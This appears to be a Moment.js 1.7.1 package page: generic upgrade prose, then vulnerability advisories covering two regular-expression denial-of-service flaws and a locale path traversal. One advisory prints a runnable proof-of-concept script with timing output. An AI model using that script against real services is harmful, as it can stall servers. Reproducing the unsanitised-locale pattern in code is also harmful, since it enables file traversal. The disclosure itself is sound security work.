Moment.js version 1.7.1 represents a subtle refinement over its predecessor, version 1.7.0, both serving as valuable tools for JavaScript developers needing to parse, manipulate, and format dates. While both versions share core functionalities and a remarkably similar structure, examining the release dates reveals that version 1.7.1 arrived approximately two months after 1.7.0, suggesting the latter incorporates bug fixes, performance enhancements, or minor feature adjustments.
Developers familiar with 1.7.0 will find a comfortable transition to 1.7.1. The API, core dependencies (jshint, nodeunit, and uglify-js), and author information remain consistent. Both versions benefit from Tim Wood's continued development and share the same GitHub repository, ensuring access to ongoing support and the library's evolution. The consistent "Parse, manipulate, and display dates" description further underscores the shared purpose and developer-friendly design philosophy across both versions.
Given the incremental nature of the version change, developers should prioritize upgrading to 1.7.1 to leverage any improvements or resolutions implemented since 1.7.0. Consulting the commit history or specific release notes (if available) on the GitHub repository is highly recommended to understand the precise changes between these versions and make informed decisions about adopting the update. This ensures optimal performance and reliability when using Moment.js for date and time handling in their projects.
All the vulnerabilities related to the version 1.7.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: